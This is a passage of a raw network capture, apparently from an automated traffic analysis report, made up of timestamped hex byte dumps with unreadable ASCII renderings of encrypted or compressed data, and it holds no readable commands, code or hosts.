9d c7 97 be 20 81 38 0a 2f ff 19 26 2d 8e 2a 7c a5 dc fe 8c 48 f4 80 89 82 e7 36 c0 a2 19 ba a6 d8 8a 8b a7 f6 e6 8e 05 35
                                                                                    Data Ascii: 0'@vkrCt8*X$8Yvm0%7'^/,=m;w ^@%cfZY&(/a{~Qlm(Z70Kw6Xh#_)TQ{:4}4E<7Fm]J[.|'%Os^# Rm! 8/&-*|H65
                                                                                    2021-11-23 13:40:02 UTC166INData Raw: ec e5 be 2b 5e 57 76 14 57 1d ee 82 67 76 a4 aa 25 1a c5 64 c6 1b 2d a7 64 37 ca d5 01 0b 4c 87 45 60 2b 7f fd 01 82 0a 09 74 31 e6 db a5 86 20 a7 80 22 b9 9c 39 d3 1e 0e e8 4c 40 f5 6e 48 d0 28 cd 71 0c a1 0f f2 bc a3 81 b8 e9 e4 24 27 fa 3b 9f a0 87 6a a4 2a 2a 5b c3 a6 41 4b 20 b4 32 38 db 82 31 ed af 57 27 5f 40 0b b2 93 d3 55 73 fe da 75 3d e7 dd 68 6f b8 d2 41 b7 9a 51 18 f8 89 a7 ab 08 a7 c0 7d 5c c4 9e 42 42 ae cc 5a 2f a4 9e b2 21 9b be 83 3b 7e 67 2e 7d cc 39 ed c2 e5 bc f5 89 48 58 14 ff 05 ce af df 0c 83 f7 59 e1 05 1c d1 68 e8 1f 23 eb 27 af ef 7f a3 83 68 63 f8 36 56 6c 63 46 fc d9 58 cb 87 cb 08 14 7a 4a 2c cf 7c 1d e0 f7 59 da 37 cb 64 6a e9 37 7b b0 e4 dc fc fd 63 9c 83 4b cd 2e 6c 8e 43 bb 68 c8 e3 70 7a ea 01 16 b1 bc 7e 9f 4c 84 c5 2e
                                                                                    Data Ascii: +^WvWgv%d-d7LE`+t1 "9L@nH(q$';j**[AK 281W'_@Usu=hoAQ}\BBZ/!;~g.}9HXYh#'hc6VlcFXzJ,|Y7dj7{cK.lChpz~L.
                                                                                    2021-11-23 13:40:02 UTC168INData Raw: e3 d5 f9 fa 5e 2c 9e 07 ec 50 a5 91 ec c5 9f 62 3b fb 59 29 71 86 74 b7 c3 19 b4 15 ce eb 17 26 e2 79 80 eb dc 05 78 68 fe f7 79 09 e0 69 d2 04 20 94 71 6a 43 5b b9 22 0c 48 c0 99 4a 1c 41 d5 bd 40 81 94 99 7e 03 4d 8e 1a 40 06 6a 8b 39 4c c4 58 a7 fc ec ee 38 ad 43 9e 42 37 09 d7 74 d6 a7 e7 84 e4 a9 57 c0 00 c1 ac 99 29 8e 38 0b 75 6b 07 73 11 2b ef 48 9a 61 63 6d d4 bb e0 b1 74 c8 aa a7 33 6e 58 64 e4 97 2f 22 e0 48 9c 58 f9 66 d1 e6 7f 9f 3b 91 db d8 82 bf 01 64 0a 81 77 ca 41 05 3f 86 14 15 5c 18 2d e6 a1 37 f9 0b d2 2e da 5b e3 37 21 07 3f 3c 0c f2 0a 26 4b c1 b9 52 9f 93 5a 5b a1 dd 18 0d 5e 30 e7 55 e0 5b 1a 8c 89 fe 69 4f cc 94 c8 43 69 e2 d1 72 f6 75 0c 1e 1b 4b 43 a2 a6 e2 3a 40 3d 60 86 d7 a9 a3 72 c8 4e b6 64 2a 65 85 64 55 85 96 10 87 2b 47
                                                                                    Data Ascii: ^,Pb;Y)qt&yxhyi qjC["HJA@~M@j9LX8CB7tW)8uks+Hacmt3nXd/"HXf;dwA?\-7.[7!?<&KRZ[^0U[iOCiruKC:@=`rNd*edU+G
                                                                                    2021-11-23 13:40:02 UTC169INData Raw: d5 85 e6 dc 4b 90 2e bd 3c 7e 5d 9d 09 d7 29 b0 9e 17 9e da 4d 2e f6 b1 4c f8 fe e9 71 e9 2b f9 26 b0 04 f8 0a 7b f6 54 d5 0f 49 59 b7 df 78 01 e1 99 cf 46 13 f0 85 77 30 cd fc e0 a9 5a 47 df 03 3e 18 b9 18 01 22 f0 d8 57 4d 2f 78 0c 95 ff b7 c9 84 42 66 e6 47 51 ee 34 b1 9a 8f 87 2d ad 4b ac ec d8 34 09 24 5e 9a a8 d9 44 a7 fa 1f 3b d4 35 ec 37 04 68 ee 00 3d d2 7f cf 61 a8 a0 89 db 9c 85 ad 8f d0 9c 31 2c 51 65 5b 0b dc 9c 9b 84 88 35 89 a9 16 da 61 22 29 22 fb 2c 3a 38 6d cd 2d e2 66 d5 45 3d 5b 2e 7a 40 4c 54 fc ef 65 11 d8 80 b4 7f 1c 9c 0e 3b f5 67 77 be cd f3 48 cc e5 61 20 f2 e6 bf 0e 57 6f b0 f0 d0 88 05 0f 70 57 55 33 67 a4 7a 74 8f d6 f4 1f 3e 36 36 7e 7f bc 74 8b c3 16 20 20 28 f8 63 4e e3 ad 46 f6 8d c9 b2 b3 99 d5 74 d6 13 80 ae ce 2b f3 27
                                                                                    Data Ascii: K.<~])M.Lq+&{TIYxFw0ZG>"WM/xBfGQ4-K4$^D;57h=a1,Qe[5a")",:8m-fE=[.z@LTe;gwHa WopWU3gzt>66~t (cNFt+'
                                                                                    2021-11-23 13:40:02 UTC170INData Raw: f9 03 e1 21 1c 76 1d 82 ee e3 d6 b3 bb 8e e7 cd 16 91 b6 2f 38 b7 72 a9 c2 60 2b c7 eb b7 6f e1 16 89 79 ed 14 a9 83 58 d3 0f c8 c2 3d d7 e5 45 a2 a5 dc 0c fb bf db 97 45 68 66 7b a1 b9 6e 27 7f 39 fa 0b 03 33 c7 28 e2 0f d0 ec ba c3 c1 3b a2 31 be 37 a0 97 80 e5 4e 7c 5f e4 dc b3 49 6b b1 96 2e 92 f0 cc 60 73 89 a8 26 b0 42 5f c4 53 aa 37 f6 e2 d3 69 a1 f6 82 44 c9 56 ec d6 29 4c aa 14 ab ff 9f 76 1d 4a 59 a4 a6 ef 9e 97 5a fa eb 2a 5c 91 a2 0f 08 6f 31 91 b8 68 23 69 49 57 4b ee 0c 7b 8e 7f 87 c2 45 bc e8 b9 f3 90 d3 11 99 40 b4 8c 50 4e eb ee 84 b8 13 72 63 5f ec 09 38 f0 08 44 e6 d3 27 9b b3 c6 39 1b 26 d5 81 81 00 8a c4 d1 75 ee ad a4 07 68 b8 3e c0 4d b2 21 87 f6 71 7a 17 c7 25 38 07 22 56 7d 69 36 a0 d6 5b dc e4 c2 eb 26 3e ec 8f 5c 2d 0b a9 09 64
                                                                                    Data Ascii: !v/8r`+oyX=EEhf{n'93(;17N|_Ik.`s&B_S7iDV)LvJYZ*\o1h#iIWK{E@PNrc_8D'9&uh>M!qz%8"V}i6[&>\-d
                                                                                    2021-11-23 13:40:02 UTC171INData Raw: 17 a3 e9 c2 e0 1a ee 5f d0 6e 20 4b 6f 68 90 63 28 03 74 0e 32 ba 9e 0f 5c 10 cc f4 54 ea af 48 c6 c1 0a 4b e4 1b 90 9d 31 d5 68 51 f8 05 c2 85 60 73 cf 28 2b d2 ce 0b 22 38 c5 2a 8f 63 8d bf 9a bf 5b 99 be d9 51 43 ab 4f df fd 6b bd d3 0a 8c 16 9e 11 00 40 30 30 2c 37 b1 f4 9a f2 10 46 e0 0e 89 9b 1b 19 3f 04 89 a4 a3 b4 38 30 b6 e2 75 db 99 9b 55 61 6e f8 92 fe 86 3b 78 85 95 d2 d9 02 c0 4c 59 4c 74 e3 a7 36 17 5a 7a fd 20 27 4e 85 06 ac 6e 30 cd 8b b4 49 f1 f9 0b 7f 95 88 81 47 38 c8 01 e0 18 94 b7 7f 59 94 5e cf be d9 e9 fd 0a 45 4a 8f 38 76 5e de 23 ba 8d 12 29 63 4c 65 da 3b dc be ab 0a ec 13 8d 72 44 cf 57 75 6b 11 5c fa 7a 2e 41 c2 ec 0f 85 7e ba ff 89 13 68 40 be b3 8c 6a 85 a3 56 02 dd d1 a9 09 3d 86 90 1d c8 cc 7e 7d 67 07 1d d1 fa 5b 35 c7 db
                                                                                    Data Ascii: _n Kohc(t2\THK1hQ`s(+"8*c[QCOk@00,7F?80uUan;xLYLt6Zz 'Nn0IG8Y^EJ8v^#)cLe;rDWuk\z.A~h@jV=~}g[5
                                                                                    2021-11-23 13:40:02 UTC173INData Raw: 0b 9f d9 e3 ab d9 f2 55 33 20 6e 98 5a 56 53 ef 06 64 89 13 76 1b 33 78 47 9d b5 51 79 cb 49 e0 c6 1a ba 62 a9 df 62 5f 6e 55 27 e2 aa f6 db c8 95 18 0f 9e 85 6d c3 d4 16 b7 87 f4 b5 d5 79 d9 b0 e2 b1 74 15 48 36 e0 f5 05 9e 1f 64 16 f9 da 09 4e 0d 0b b7 2b 23 8d f1 7a 60 90 6e 8e b4 9b 6f 06 b0 61 1a c8 94 66 a5 2c 30 ab cf 04 72 7d 07 4d 6e 7a cc a4 10 04 2f 4c 1c ba 80 b6 8b 1d 6f db 35 cb 50 ad d3 70 84 80 db 5a 97 3b 42 88 b2 81 31 d2 6c 39 ad 80 ae 9a 44 d0 88 39 a3 41 08 e8 16 af 7f 15 5a 49 8b a3 d6 b5 3e 28 97 a4 fd 99 90 08 40 a2 bc 59 fe 22 e1 b5 d2 18 0d f7 52 24 55 97 39 26 1b 3d 3b 6c df 94 63 32 f9 f4 59 b0 3e 19 28 13 a0 e5 64 98 9a 26 7a e3 78 3b 55 2b 0e 8f 8e d4 1c e6 22 04 2b e6 20 01 97 98 b7 f5 e8 1f 55 c6 4e 67 25 35 45 c0 69 da 3e
                                                                                    Data Ascii: U3 nZVSdv3xGQyIbb_nU'mytH6dN+#z`noaf,0r}Mnz/Lo5PpZ;B1l9D9AZI>(@Y"R$U9&=;lc2Y>(d&zx;U+"+ UNg%5Ei>
                                                                                    2021-11-23 13:40:02 UTC174INData Raw: 8f 31 a6 e5 02 3c f5 48 91 9c 8c a7 df d8 eb 81 34 4c 16 1d 65 7c ef 1c 8a 6b 0a c3 ff 40 c1 df 8e 83 78 ce 29 d4 54 d8 df 0d 22 09 55 09 af 9d ec 18 f8 57 83 1c 36 b0 e1 43 9a cd 35 8d 09 b9 5e 77 ed df 37 61 35 b2 72 e0 3e 55 36 d7 cb fa ff 73 47 39 76 ae f9 55 6b a0 e2 07 db 6c 7e 09 fd d5 8a 9b 9f 67 6f 78 5b 90 e6 e7 7d a6 4d b7 b2 05 55 c0 42 7f 29 ba 5f 91 8e 55 4d e2 a2 f1 1d 43 16 fa ca db 75 38 5b 67 40 b0 29 47 0f 93 c9 0f 0c dd e8 28 3e c4 8b 2a c3 75 60 aa e6 b5 c8 92 6f d6 9d 71 a9 3c 5b cb 98 43 5e 7b ea 77 4e ac 95 c1 f3 45 df b9 ad ea 66 e5 52 91 e5 55 68 f6 82 83 94 55 67 94 4b 9d eb 29 f7 33 58 84 b8 66 fe 6a a7 46 f4 66 69 43 e5 32 56 32 e9 9d 0c ac dd 9d e3 2c 7d 50 78 00 8b c8 8a 86 20 ff 67 b8 50 24 2b b9 34 b7 d0 12 ae 76 3b f7 70
                                                                                    Data Ascii: 1<H4Le|k@x)T"UW6C5^w7a5r>U6sG9vUkl~gox[}MUB)_UMCu8[g@)G(>*u`oq<[C^{wNEfRUhUgK)3XfjFfiC2V2,}Px gP$+4v;p
                                                                                    2021-11-23 13:40:02 UTC175INData Raw: 99 e8 07 42 d2 13 8a 55 36 d2 c2 fb a5 98 c8 30 b6 dc af 48 17 0c 6f cb 16 74 57 77 4c 38 b8 ad 90 f7 b4 ef 66 a0 e7 27 33 95 e6 d5 f8 e9 25 15 8c d1 b5 2f a0 9c 8b 69 56 d3 50 c9 f1 68 54 74 b9 df 27 7c c5 45 2e c9 d4 3e c4 3b 5f 39 a5 d7 ad 54 aa 9b 48 b3 bc b7 fa fc 31 4c 48 1a 77 e4 b4 c4 26 80 89 0e 38 49 ee e8 c5 bf dd 4c fc 28 cd 04 cd 6c 01 15 2d 53 09 de d3 6e 26 ff 07 de e1 5a 09 d4 56 a5 69 ff 30 0a f1 49 8d 63 02 95 f5 41 98 bc 7f 79 36 b3 1a d0 3d df bb 4c 2e 5d 94 d0 65 7e 2b ca 23 5f 65 3b ee 2c fe e5 5b ea aa eb 07 da 88 3e 32 a8 d9 46 c7 5d 9d 5d 78 1e 7c 8b b1 6a 1d 39 9c 34 3f 56 e9 17 60 a0 c3 de be 19 a7 ef ea 03 fc 66 ed 69 c3 91 0d c7 d3 d1 89 72 11 83 27 3a b9 38 f8 4a 27 d3 61 99 17 86 5e 11 dd ce 91 14 1b 3f c1 1d fc dc b4 4c f9
                                                                                    Data Ascii: BU60HotWwL8f'3%/iVPhTt'|E.>;_9TH1LHw&8IL(l-Sn&ZVi0IcAy6=L.]e~+#_e;,[>2F]]x|j94?V`fir':8J'a^?L
                                                                                    2021-11-23 13:40:02 UTC176INData Raw: c5 95 22 ed 8b 5c f9 29 9d a7 72 66 2f 90 cf 24 37 f9 65 7b 49 f8 eb cf 2f c1 6b b3 8d b0 35 5a 29 2c 8f 31 70 e2 9b 37 3f 2c 3b b3 b4 36 7d 65 d4 19 40 8c d5 37 9f 69 5b 5e 76 a0 b3 d7 c1 4f e7 3b 4d 10 8f 45 37 9a b9 11 cd 02 09 b2 ce 94 9f 6d 39 24 1d 30 40 63 e0 fa 5e 71 65 ee 17 ad c1 40 75 d2 91 ba ec 2f 7f d0 1a 2c 87 9a c4 5f 1e ba d8 a4 e9 2a dc f3 fc eb 5c 50 7d 33 7e 0d 89 37 d2 1e 03 a6 5f f5 6f d7 d4 f5 08 76 66 59 cc c9 e7 61 c2 39 b0 26 9b 25 2b 1d 6d 95 3b bb a4 b7 8f 90 f8 72 8f 03 99 d4 ef 31 17 37 b7 f7 03 1a 77 31 11 1e 13 4d 01 50 19 22 71 f7 1a 5b c5 bc 8b 08 c1 08 bb cc e3 72 a9 64 bb be 86 ef d2 6c 3c 63 ad fd 65 b5 ec 54 51 93 b6 0c 91 38 fb cb 69 8a a9 18 34 1e 66 9c fd 36 5a be 2e e3 4f f1 bc b6 97 80 7d 68 1e f5 4f 4c 1c 9b 17
                                                                                    Data Ascii: "\)rf/$7e{I/k5Z),1p7?,;6}e@7i[^vO;ME7m9$0@c^qe@u/,_*\P}3~7_ovfYa9&%+m;r17w1MP"q[rdl<ceTQ8i4f6Z.O}hOL
                                                                                    2021-11-23 13:40:02 UTC178INData Raw: 0e 55 41 d2 2c 3f c7 19 5b aa 2d 66 07 a0 a1 bc 36 3d 28 02 2f a5 9f 8f 42 39 5c f0 ee fe 12 d2 9f 09 fe 83 09 e5 97 a9 0f 81 5f e7 51 a5 4e 73 d1 a2 65 1b 36 d4 27 fe 73 29 48 54 55 6b d9 e4 91 d6 cc 13 6a 06 ab 75 23 39 3b 74 60 de 26 ac 4c c4 ec b0 b6 3f b5 ee 14 f5 98 19 28 36 6e 4b ed 2d a8 49 48 8b 9b 97 00 0b 60 ea d4 4d 17 51 74 c4 51 84 a1 bc c9 5c 94 49 aa 60 3e 0e 74 ba 0e 2a 66 20 cf 66 3f 1c 98 21 e9 c1 57 77 7b 27 87 e4 c3 2f d5 91 fc 63 05 f6 0a 43 73 77 b3 d7 6b d3 42 2a 24 83 7d 6c
                                                                                    Data Ascii: UA,?[-f6=(/B9\_QNse6's)HTUkju#9;t`&L?(6nK-IH`MQtQ\I`>t*f f?!Ww{'/cCswkB*$}l
                                                                                    2021-11-23 13:40:02 UTC178INData Raw: 1a 8d 55 20 88 5d 30 68 9e d5 98 14 70 99 7e ee 56 79 0f 65 af 9a 1d 79 f6 1b 74 37 06 1e 85 13 8a 4d 76 1f f8 df 8a e1 af 8b bd 83 04 99 05 23 de e9 65 8e 41 e4 0c 5f 45 02 26 d0 0e f0 c7 75 d8 31 e2 b5 76 e0 c7 e1 a8 7f 97 18 84 c8 dc d9 31 f8 1d 4f 60 45 c4 1d b8 e4 e4 f5 56 e5 3a 5a c6 c4 e0 b2 cc 9c a5 b1 57 d9 32 50 e6 8a 11 f1 b8 bc cb 70 32 4d dc 19 fc 01 26 48 14 3e ae 06 74 08 75 c9 73 82 d8 db 57 9f 71 d1 db f3 66 b6 7a 67 ab 99 07 0f 4e 74 53 d1 9e a6 e5 88 bb 7c a5 28 47 43 0b 88 8c 6c 3a b4 3b 53 c8 4f 03 9a f2 67 72 f1 df 67 b9 14 fa 7d e1 73 07 60 1a e9 f9 d4 48 79 6e 9e 24 1a a9 cb 8e be 95 ff 8f 8c 8e e4 94 6d e6 55 73 04 c0 a4 89 bb 84 20 74 1f 17 c1 a9 5e f6 e2 77 6f da 23 19 f6 cc 47 79 bc 61 b2 0d bc df d6 18 b4 e9 98 25 ab 07 fb f7
                                                                                    Data Ascii: U ]0hp~Vyeyt7Mv#eA_E&u1v1O`EV:ZW2Pp2M&H>tusWqfzgNtS|(GCl:;SOgrg}s`Hyn$mUs t^wo#Gya%
                                                                                    2021-11-23 13:40:02 UTC179INData Raw: 37 38 e3 b4 81 6c 26 88 dd 8d d1 0d 4f b9 6c 58 93 ac 49 11 99 5b 25 b4 85 b2 7b 0c 0c bf b0 a1 21 25 ed 2c ac a9 60 0e bc 7d 3d f6 21 77 33 de 3e b8 5c 6c a7 5e 9d fd 1e 40 ca 5a aa 8f 18 6d 29 e0 df 73 f1 54 02 f1 7f 70 6d 34 cd fd c4 66 c0 7f 3f 34 1e 47 e1 69 c7 0d 2d ac 0c 79 e4 8b 46 3a 54 55 f3 e2 a4 3a 24 53 7e 85 61 5e 9a 35 c7 40 e7 e2 e8 6f b2 cc 07 73 c0 74 1f 88 4a 1b 5c d4 23 40 d4 30 d7 9b 97 45 24 f0 89 33 84 44 f7 68 72 13 7b f4 e3 6b 01 11 a7 81 cb 29 ce 8c 6f e7 98 9a 2a 5f b3 30 95 d6 de bd 46 03 97 1c 8f 64 df 2b e9 fb 63 9e 1d db fd de 1e 28 4c 17 5c d2 5d 2d 9e c2 9b da 6e cf 3a a9 2c e0 53 62 7b ab bf 9c 83 cf 3f ef d6 b2 2b 8a f1 89 96 18 4d 93 a0 48 23 2b 46 8c 1b e2 f3 93 f0 a2 e7 f5 dc 7e 9b 52 06 c6 e0 0d f7 c7 a2 89 de f6 61
                                                                                    Data Ascii: 78l&OlXI[%{!%,`}=!w3>\l^@Zm)sTpm4f?4Gi-yF:TU:$S~a^5@ostJ\#@0E$3Dhr{k)o*_0Fd+c(L\]-n:,Sb{?+MH#+F~Ra
                                                                                    2021-11-23 13:40:02 UTC180INData Raw: 5c 38 dc 12 d6 e5 2b ef ea c6 51 19 4f 73 4e fe e4 ee 89 8c 8c 34 e0 b7 1c f4 9f 5d 86 b9 ee 4d 38 ef 88 f2 dd 24 52 30 e0 e9 6f 61 bd f1 3e 02 a4 85 5c ac 4c b6 98 cb 6c c4 07 38 ea 47 9c f9 df 22 d8 98 d4 00 58 1a 26 37 15 d0 ae 48 17 34 f8 80 c9 9f e9 26 09 60 44 e3 56 5f 0b 7f fb e2 c4 f3 6e d2 d8 60 8a 3b cf e9 8d fd b6 0f ba 6d 93 7e 23 50 35 fb 93 d5 31 c8 4d 31 58 e4 b3 63 6e c5 66 48 68 65 52 62 a7 f2 0a 00 2c 44 1e 22 47 f3 14 cd 6b 0f 76 fb 38 5c a7 7d 06 da 27 93 1e 68 21 54 09 8f fd a8 4c 22 6a 2c 8a fa c0 fe 80 e0 f4 3e 9e d2 d5 76 86 7d 94 44 2f 76 79 54 66 5b 40 f4 b2 2f 9a 3c ef 5e ef 6a 0d 28 03 2d e8 f2 a6 0c 3e b8 dd 90 ce 81 39 ba 2f df 57 ed eb ad 50 22 ab 93 13 2f 20 49 8e 93 ea 42 9c 11 3c ee 74 81 20 c1 33 50 f5 53 4b 43 b2 08 07
                                                                                    Data Ascii: \8+QOsN4]M8$R0oa>\Ll8G"X&7H4&`DV_n`;m~#P51M1XcnfHheRb,D"Gkv8\}'h!TL"j,>v}D/vyTf[@/<^j(->9/WP"/ IB<t 3PSKC
                                                                                    2021-11-23 13:40:02 UTC182INData Raw: b2 fc d4 46 0c 43 70 66 b6 79 f5 b5 a4 11 7d d2 72 0c 06 e3 c9 f9 9b fe 17 a7 4b 62 48 22 10 68 4a 1c 84 30 03 46 60 cc 9b 08 0d 15 3a 03 38 04 ad 06 99 fd 2e b0 bb b4 15 d2 78 d1 b9 b5 d9 8f 32 1c 10 b8 b5 43 18 64 1f db 2d 80 65 36 92 33 6b 4b ac d6 da a8 fb ed de f4 cf e1 79 83 a2 77 37 a8 16 b2 75 f8 a4 cb 81 d6 b1 9d d3 89 3c 75 ff 85 73 ec ee 96 e0 6b 50 a8 18 80 84 e5 dc 40 50 22 41 7d 7d fc d9 e6 df 01 54 54 e0 a4 91 33 4a 0e 0d 5e 51 f9 e2 65 68 25 e7 ec 6a eb 9e 53 45 ce f7 5a 49 f6 88 06 7d 93 12 84 06 6a f4 5e ff e4 9d 6e b9 cd 73 ca b4 88 65 44 8b 6b 99 40 ef 17 1b 1a cd 1a e2 41 5d 3a 8f 13 1c 88 44 c0 3f 31 a9 27 33 c7 5e 05 69 ce 23 28 be 34 6a 3b 81 b8 f6 9a 6d 03 34 b0 c7 10 c4 0b 50 7c ac 64 c0 e2 31 47 f5 51 c5 5c f4 a2 9d 97 24 88 c8
                                                                                    Data Ascii: FCpfy}rKbH"hJ0F`:8.x2Cd-e63kKyw7u<uskP@P"A}}TT3J^Qeh%jSEZI}j^nseDk@A]:D?1'3^i#(4j;m4P|d1GQ\$
                                                                                    2021-11-23 13:40:02 UTC183INData Raw: a1 cb 41 7f 9f 28 77 0a 53 7d 00 3a f0 8a ec e7 39 f9 0d 70 ce e1 fd 88 16 57 0a 59 e5 de 95 89 61 7d ef 68 f8 31 d7 43 2b 8a 1b 1d 2a 25 ca 09 b3 05 53 3c e3 6b b2 d6 a2 fc 5b cb 49 43 93 a0 5c e2 78 fe 75 bf 1f e1 15 e9 8d 98 8d c9 c4 28 77 31 4f 8e 0b fd 4f bb 37 37 f3 5c 02 67 3a 37 e2 c1 0a 42 c6 ae 06 56 55 5b 9e e6 14 0c 6a f7 5a d8 16 1a 9f 2e 68 33 9f ea d9 54 11 f5 c7 50 87 3d a0 21 4a 0a 96 f4 f0 a2 ff d9 42 1e 5d 17 fe 5b 92 c7 24 d0 b5 0b f1 67 7e 7d a1 09 9f 6f 89 8b 42 11 bf 10 b0 ae da 3d 6e 10 5f 4c e5 f3 7c 99 96 35 24 ca d0 c3 fc cb 70 ae c7 aa 9a e9 0f 25 49 5e 9a a1 c3 d9 7d b7 8a a5 a3 a3 3f 36 fa 0c 2e 83 49 4d ab 26 57 05 5f f7 0a a8 c2 8c a5 b9 18 ac 5c 24 df 61 90 7c a5 d7 1b 5f 3a 5c 07 95 52 b7 0e 44 4e 48 58 41 28 b6 db d2 72
                                                                                    Data Ascii: A(wS}:9pWYa}h1C+*%S<k[IC\xu(w1OO77\g:7BVU[jZ.h3TP=!JB][$g~}oB=n_L|5$p%I^}?6.IM&W_\$a|_:\RDNHXA(r
                                                                                    2021-11-23 13:40:02 UTC184INData Raw: 1f 8e 1a 4e 41 7a eb 73 0e 63 1c 1c f4 27 fa fc 2b d7 8e 86 c1 98 67 0f 34 13 84 9e 39 c4 82 6c f4 31 8b 37 a1 89 05 a5 4b da ca 1c b5 11 c5 b9 35 8b 47 79 b3 37 8e d9 18 d5 94 17 8b 29 7a 17 1e 5b 4f e9 11 62 9f 2e c1 95 87 20 75 ca ca 59 dd 70 24 90 af 45 41 0b cc 4d af b6 86 53 2f 15 6d 03 76 15 de 8c aa 6c 80 fa 1b 47 04 4f a2 e0 13 f2 2c 39 8d 35 7f af a2 f8 22 85 c8 82 c5 ed c5 f8 23 ce d7 10 fa 1b 45 14 19 58 e3 ad f4 66 4a 70 2b 48 83 06 d9 c3 57 66 dd 1d df f0 68 85 f5 fe e7 19 b3 b9 08 42 d3 74 b0 6f b2 2f 26 2d 15 51 3c 88 b1 a7 1e 53 04 69 d4 55 6c 03 2e cf cc 48 70 52 26 fa ef ca e0 a2 11 ef 5a 10 63 09 89 83 f1 c7 60 ff 0e c8 a3 ea a0 19 c8 7f b2 1c fb 84 d4 ed 38 e8 0a d7 c7 c2 a5 96 28 43 20 5b da 66 b3 08 8d 08 42 63 65 3a cd 83 e1 a2 d5
                                                                                    Data Ascii: NAzsc'+g49l17K5Gy7)z[Ob. uYp$EAMS/mvlGO,95"#EXfJp+HWfhBto/&-Q<SiUl.HpR&Zc`8(C [fBce:
                                                                                    2021-11-23 13:40:02 UTC186INData Raw: 4b d9 0f a8 c7 6f 0d 5a d6 8e 68 0a 08 1b c6 2a e5 9f 52 ad de 7b b9 9c 83 00 6e 98 f4 9d ef 27 32 2e 56 af 43 a5 6f e3 3a 0d 43 12 9e 1b 38 4e 56 93 7c 80 9e 01 c2 09 cd a8 2a 78 7a 85 f8 6b 4c eb b7 46 49 3a a7 ad a1 49 3e 35 58 7c 2a 40 04 77 89 e3 a3 a1 45 86 62 5c e7 a6 2e 9b 2f 4d 59 96 be 87 26 69 d2 56 ae 8f a8 95 f4 e7 21 aa 0a 36 0c 79 1d 8a 94 31 37 86 10 2a 9d a5 ef 51 a7 c7 55 e9 66 88 bf a9 e3 76 d5 38 f2 b6 cb 7e d3 90 b3 81 cd 83 ab 18 e4 69 cc 7f b2 4a e0 79 47 94 e5 18 a9 71 03 9d bc 34 6f f2 11 6a 98 3a 01 52 5c 39 d7 f8 68 49 f2 c0 1e 7d 12 fb 7e f9 49 d0 34 94 8d 50 0b bb 48 55 ee 6c 80 15 24 ae e6 2b 35 2a 23 3f 88 1d 40 28 bb ca a2 4e c9 49 73 0d 55 b1 64 d2 7b ea 4a 58 b1 0e ef bd 47 64 d8 e3 73 04 a6 63 bb df 5c f7 cd 5f 57 20 58
                                                                                    Data Ascii: KoZh*R{n'2.VCo:C8NV|*xzkLFI:I>5X|*@wEb\./MY&iV!6y17*QUfv8~iJyGq4oj:R\9hI}~I4PHUl$+5*#?@(NIsUd{JXGdsc\_W X
                                                                                    2021-11-23 13:40:02 UTC187INData Raw: ef d6 2b a1 c8 02 aa ca 7b d1 73 1a 41 ed 6d 74 98 0b 4d f4 99 96 b5 c6 cb 1b 2a a1 a7 5a 03 67 f5 95 9c 00 ab 46 c6 a7 41 91 ba 10 5e 82 00 f9 40 0c 70 9d 2d 74 45 c5 7e c5 ad d4 ee b8 22 8b 9d cb 14 b8 24 fb 14 b2 f1 ed 65 72 55 55 6a f4 dd 2d 58 f4 e1 00 cc 59 1f e9 07 8b 2f c5 9e 9b be 32 0e 65 52 ca d7 eb a6 97 21 c4 af 02 ed 2b aa 74 b2 4a 2c e4 23 40 f2 54 87 ba cd 18 ca 0c 9a ae f0 0e 03 22 98 70 af c5 29 10 a0 3b a9 e9 7e 8f 8e 92 b8 fb 0f 0a f9 ce 73 f2 06 f6 61 cf 03 8a cc 06 d5 17 83 57 0d 40 27 0a a9 87 1c 6f 5d 70 f8 40 2a 84 02 ff 89 93 aa 64 03 f3 da fa b8 cc 2b bf 6d af fc 6f 88 63 09 68 54 45 18 64 2e da 50 6f 65 dc 2c 8b 35 42 48 d1 e3 e2 64 67 ea 58 3c 59 01 38 c3 96 ac 04 65 aa 24 59 1c fd b7 17 d2 fa 31 40 40 0a e3 b4 6e f8 9d 63 e8
                                                                                    Data Ascii: +{sAmtM*ZgFA^@p-tE~"$erUUj-XY/2eR!+tJ,#@T"p);~saW@'o]p@*d+mochTEd.Poe,5BHdgX<Y8e$Y1@@nc
                                                                                    2021-11-23 13:40:02 UTC188INData Raw: ae c0 47 26 46 cf 75 6d c4 fd c0 91 66 d8 ae 5b 49 dc 88 54 4a 97 d4 9b a9 3b ca af 27 ac ef 9f f3 de 0d fe bd e0 ea 8f 04 a9 b1 d1 ba 58 cf ae f8 ab fe 89 3a a5 00 c8 2a e4 94 e6 b4 e3 b9 35 fb 30 81 d2 7e 88 0e 6b 7f 86 9e ce 78 79 83 0e dc e0 94 0c 79 44 ab 7f 7e a8 17 00 2e ed 9b 27 82 a5 c4 a6 2e 91 89 4a c4 34 bd 41 ff aa e7 5a 58 63 d6 93 87 82 8f 91 ca 39 de 76 d0 17 14 42 7e 7b d6 13 ac cc c6 14 ee d9 d0 af 7c e5 e7 30 c5 98 23 13 bc 8d 80 c8 ec 58 9e 53 4d 02 27 da 0a ad 2b 24 3d 38 29 2b 39 da ce 1f 5d f3 a7 dd 38 bc 57 09 9d 46 1e 12 5f 80 0e 6a 68 d6 f0 71 30 75 ef 20 67 e2 c3 f5 9e 3a e4 12 0f 1e 57 26 52 21 a7 aa 49 e9 1f 5b 05 66 78 4e 18 f8 4c 05 e1 e3 4c 91 15 5e 52 79 57 cb 49 3a 42 9d 95 12 cc 8b 37 c3 30 86 81 d9 f3 5d c5 4b aa c2 09
                                                                                    Data Ascii: G&Fumf[ITJ;'X:*50~kxyyD~.'.J4AZXc9vB~{|0#XSM'+$=8)+9]8WF_jhq0u g:W&R!I[fxNLL^RyWI:B70]K
                                                                                    2021-11-23 13:40:02 UTC189INData Raw: 35 65 3e c0 ed 35 03 6a 84 11 9f ab dc c5 5c 4d c6 52 70 37 2f 9c 34 6e 49 ee f8 5b 9f df ff 56 72 70 59 c7 a9 0e 06 4b b6 38 32 5c d1 26 ae 13 6c f7 41 41 52 08 14 ce c8 22 93 ca 4a fc 71 1f 5b 5c 4f 6e 19 c4 09 f9 dd 17 0e 84 d2 fa 7c 1f 5a 25 44 8e 6d 00 d3 dd 86 7b e7 0a 50 e3 01 f7 48 7d 94 6a fa 7a 65 73 14 67 8b 64 6d c3 38 69 2c 84 7e 0f 48 25 e0 a2 7a 38 bc 32 cf d0 03 46 18 a6 77 a8 e4 52 bc 1c 13 06 18 b3 98 b1 8d 6d 6e 54 b7 f7 05 5e 61 fe ed 09 29 cf 87 f2 90 40 6a b9 8b e8 ed 0a 73 8b 0d 2f 46 42 5b 0c d8 a5 17 4f fe 3c 6d 81 65 51 fb de 92 94 36 af 71 f1 86 